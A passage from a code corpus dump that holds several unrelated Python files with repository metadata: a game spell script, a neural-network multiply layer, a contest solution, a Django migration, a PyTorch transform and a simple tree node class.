spell.duration = spell.caster_level #1 round/cl
spellTarget = spell.target_list[0]
    bonusPool = spell.caster_level * 2 #Luck Pool is twice the caster level
    bonusToAdd = spell.caster_level/2 #a single bonus cannot exceed half the caster level
spellTarget.obj.condition_add_with_args('sp-Improvisation', spell.id, spell.duration, bonusToAdd, bonusPool, 0, 0, 0)
spellTarget.partsys_id = game.particles('sp-Heroism', spellTarget.obj)
spell.spell_end(spell.id)
def OnBeginRound(spell):
print "Improvisation OnBeginRound"
def OnEndSpellCast(spell):
print "Improvisation OnEndSpellCast" | 35.8 | 121 | 0.755307 | 109 | 895 | 6.091743 | 0.422018 | 0.099398 | 0.138554 | 0.051205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009174 | 0.147486 | 895 | 25 | 122 | 35.8 | 0.861075 | 0.09162 | 0 | 0 | 0 | 0 | 0.225647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.055556 | null | null | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1a118f7d8b03da075a37997cfb06c80ceb08fc58 | 907 | py | Python | mobula/operators/Multiply.py | wkcn/mobula | 4eec938d6477776f5f2d68bcf41de83fb8da5195 | [
"MIT"
] | 47 | 2017-07-15T02:13:18.000Z | 2022-01-01T09:37:59.000Z | mobula/operators/Multiply.py | wkcn/mobula | 4eec938d6477776f5f2d68bcf41de83fb8da5195 | [
"MIT"
] | 3 | 2018-06-22T13:55:12.000Z | 2020-01-29T01:41:13.000Z | mobula/operators/Multiply.py | wkcn/mobula | 4eec938d6477776f5f2d68bcf41de83fb8da5195 | [
"MIT"
] | 8 | 2017-09-03T12:42:54.000Z | 2020-09-27T03:38:59.000Z | from .Layer import *
class Multiply(Layer):
def __init__(self, models, *args, **kwargs):
self.check_inputs(models, 2)
Layer.__init__(self, models, *args, **kwargs)
def reshape(self):
self.Y = np.zeros(self.X[0].shape)
def forward(self):
self.Y = np.multiply(self.X[0], self.X[1])
def backward(self):
self.dX = [np.multiply(self.dY, self.X[1]), np.multiply(self.dY, self.X[0])]
class MultiplyConstant(Layer):
def __init__(self, model, *args, **kwargs):
self.check_inputs(model, 1)
Layer.__init__(self, model, *args, **kwargs)
self.constant = kwargs["constant"]
def reshape(self):
self.Y = np.zeros(self.X.shape)
def forward(self):
self.Y = self.X * self.constant
def backward(self):
self.dX = self.dY * self.constant
Multiply.OP_L = MultiplyConstant
Multiply.OP_R = MultiplyConstant
| 32.392857 | 84 | 0.624035 | 126 | 907 | 4.333333 | 0.253968 | 0.064103 | 0.065934 | 0.06044 | 0.589744 | 0.377289 | 0.113553 | 0.113553 | 0.113553 | 0 | 0 | 0.009929 | 0.222712 | 907 | 27 | 85 | 33.592593 | 0.764539 | 0 | 0 | 0.25 | 0 | 0 | 0.00882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.041667 | 0 | 0.458333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
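`Multiply.backward` above is the product rule: for Y = X0 * X1, the gradients are dX0 = dY * X1 and dX1 = dY * X0. A small numpy sketch verifying those expressions directly (the arrays and the all-ones upstream gradient are illustrative, not taken from the framework):

```python
import numpy as np

# Forward: Y = X0 * X1 (elementwise), as in Multiply.forward.
x0 = np.array([1.0, 2.0, 3.0])
x1 = np.array([4.0, 5.0, 6.0])
y = np.multiply(x0, x1)

# Backward: with upstream gradient dY, the product rule gives
# dX0 = dY * X1 and dX1 = dY * X0, matching Multiply.backward.
dy = np.ones_like(y)          # pretend the upstream gradient is all ones
dx0 = np.multiply(dy, x1)
dx1 = np.multiply(dy, x0)

print(y)    # [ 4. 10. 18.]
print(dx0)  # [4. 5. 6.]
print(dx1)  # [1. 2. 3.]
```

With a unit upstream gradient each input's gradient is simply the other input, which is why `MultiplyConstant.backward` reduces to `dY * constant`.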
1a1fd264d38d2e67d8ce555d1064ae3d9aad16df | 141 | py | Python | abc/abc145/abc145b.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | [
"MIT"
] | 1 | 2019-08-21T00:49:34.000Z | 2019-08-21T00:49:34.000Z | abc/abc145/abc145b.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | [
"MIT"
] | null | null | null | abc/abc145/abc145b.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | [
"MIT"
] | null | null | null | N = int(input())
S = input()
if N % 2 == 1:
print('No')
exit()
if S[:N // 2] == S[N // 2:]:
print('Yes')
else:
print('No')
| 11.75 | 28 | 0.411348 | 24 | 141 | 2.416667 | 0.5 | 0.103448 | 0.103448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040816 | 0.304965 | 141 | 11 | 29 | 12.818182 | 0.55102 | 0 | 0 | 0.222222 | 0 | 0 | 0.049645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
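The contest script above prints Yes exactly when S is some string written twice. The same check as a function, with the `input()` calls replaced by parameters so it can be tested directly (the function name is an illustrative choice):

```python
def is_doubled_string(n, s):
    """Return 'Yes' if s (length n) is two copies of the same string."""
    if n % 2 == 1:
        return 'No'           # odd length can never split into two equal halves
    return 'Yes' if s[:n // 2] == s[n // 2:] else 'No'

print(is_doubled_string(6, 'abcabc'))  # Yes
print(is_doubled_string(6, 'abcabd'))  # No
print(is_doubled_string(5, 'aaaaa'))   # No
```

The early exit for odd N mirrors the `exit()` in the script: comparing the two halves is only meaningful when the length is even.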
a7e0cc5a6d14c321badeeffabba58fb153ebc18b | 657 | py | Python | eap_backend/eap_api/migrations/0005_alter_eapuser_is_active.py | alan-turing-institute/AssurancePlatform | 1aa34b544990f981a289f6d21a832657ad19742e | [
"MIT"
] | 5 | 2021-09-28T15:02:21.000Z | 2022-03-23T14:37:51.000Z | eap_backend/eap_api/migrations/0005_alter_eapuser_is_active.py | alan-turing-institute/AssurancePlatform | 1aa34b544990f981a289f6d21a832657ad19742e | [
"MIT"
] | 69 | 2021-09-28T14:21:24.000Z | 2022-03-31T17:12:19.000Z | eap_backend/eap_api/migrations/0005_alter_eapuser_is_active.py | alan-turing-institute/AssurancePlatform | 1aa34b544990f981a289f6d21a832657ad19742e | [
"MIT"
] | 1 | 2021-09-28T15:11:00.000Z | 2021-09-28T15:11:00.000Z | # Generated by Django 3.2.8 on 2022-05-31 10:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("eap_api", "0004_auto_20220531_0935"),
]
operations = [
migrations.AlterField(
model_name="eapuser",
name="is_active",
field=models.BooleanField(
default=True,
help_text=(
"Designates whether this user should be treated as active. "
"Unselect this instead of deleting accounts."
),
verbose_name="active",
),
),
]
| 25.269231 | 81 | 0.531202 | 63 | 657 | 5.412698 | 0.84127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07598 | 0.378995 | 657 | 25 | 82 | 26.28 | 0.759804 | 0.068493 | 0 | 0.157895 | 1 | 0 | 0.252459 | 0.037705 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a7e26aa446e86411030f396561a3b8cb6f32b961 | 465 | py | Python | lucid_torch/transforms/monochrome/TFMSMonochromeTo.py | HealthML/lucid-torch | 627700a83b5b2690cd8f95010b5ed439204102f4 | [
"MIT"
] | 1 | 2021-08-20T07:38:09.000Z | 2021-08-20T07:38:09.000Z | lucid_torch/transforms/monochrome/TFMSMonochromeTo.py | HealthML/lucid-torch | 627700a83b5b2690cd8f95010b5ed439204102f4 | [
"MIT"
] | 5 | 2021-03-19T15:50:42.000Z | 2022-03-12T00:53:17.000Z | lucid_torch/transforms/monochrome/TFMSMonochromeTo.py | HealthML/lucid-torch | 627700a83b5b2690cd8f95010b5ed439204102f4 | [
"MIT"
] | null | null | null | import torch
class TFMSMonochromeTo(torch.nn.Module):
def __init__(self, num_dimensions: int = 3):
super(TFMSMonochromeTo, self).__init__()
if not isinstance(num_dimensions, int):
raise TypeError()
elif num_dimensions < 2:
raise ValueError()
self.num_dimensions = num_dimensions
def forward(self, data: torch.Tensor):
return data.expand(data.shape[0], self.num_dimensions, *data.shape[2:])
| 31 | 79 | 0.658065 | 55 | 465 | 5.309091 | 0.527273 | 0.267123 | 0.174658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011268 | 0.236559 | 465 | 14 | 80 | 33.214286 | 0.811268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.090909 | 0.454545 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a7e93039a39687c72a48499f5a446f6400a42bad | 412 | py | Python | data-structures/trees/node/node.py | b-ritter/python-notes | e08e466458b8a2987c0abe42674da4066c763e74 | [
"MIT"
] | 1 | 2017-05-04T18:48:45.000Z | 2017-05-04T18:48:45.000Z | data-structures/trees/node/node.py | b-ritter/python-notes | e08e466458b8a2987c0abe42674da4066c763e74 | [
"MIT"
] | null | null | null | data-structures/trees/node/node.py | b-ritter/python-notes | e08e466458b8a2987c0abe42674da4066c763e74 | [
"MIT"
] | null | null | null | class Node():
def __init__(self, value=None):
self.children = []
self.parent = None
self.value = value
def add_child(self, node):
        if isinstance(node, Node):
node.parent = self
self.children.append(node)
else:
raise ValueError
def get_parent(self):
return self.parent.value if self.parent else 'root' | 27.466667 | 59 | 0.553398 | 48 | 412 | 4.541667 | 0.4375 | 0.137615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.342233 | 412 | 15 | 59 | 27.466667 | 0.804428 | 0 | 0 | 0 | 0 | 0 | 0.01937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
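A quick usage sketch of the `Node` class. The class is repeated here (lightly tidied to use `isinstance`) so the snippet runs on its own; the tree values are illustrative:

```python
class Node():
    # Same class as above, repeated so the sketch is self-contained.
    def __init__(self, value=None):
        self.children = []
        self.parent = None
        self.value = value

    def add_child(self, node):
        if isinstance(node, Node):
            node.parent = self
            self.children.append(node)
        else:
            raise ValueError

    def get_parent(self):
        return self.parent.value if self.parent else 'root'

root = Node('root')
leaf = Node('leaf')
root.add_child(leaf)
print(leaf.get_parent())       # root
print(root.get_parent())       # root (a node with no parent falls back to 'root')
print(root.children[0].value)  # leaf
```

Note that `add_child` wires the back-pointer (`node.parent = self`) as well as appending, so parent and child stay consistent after a single call.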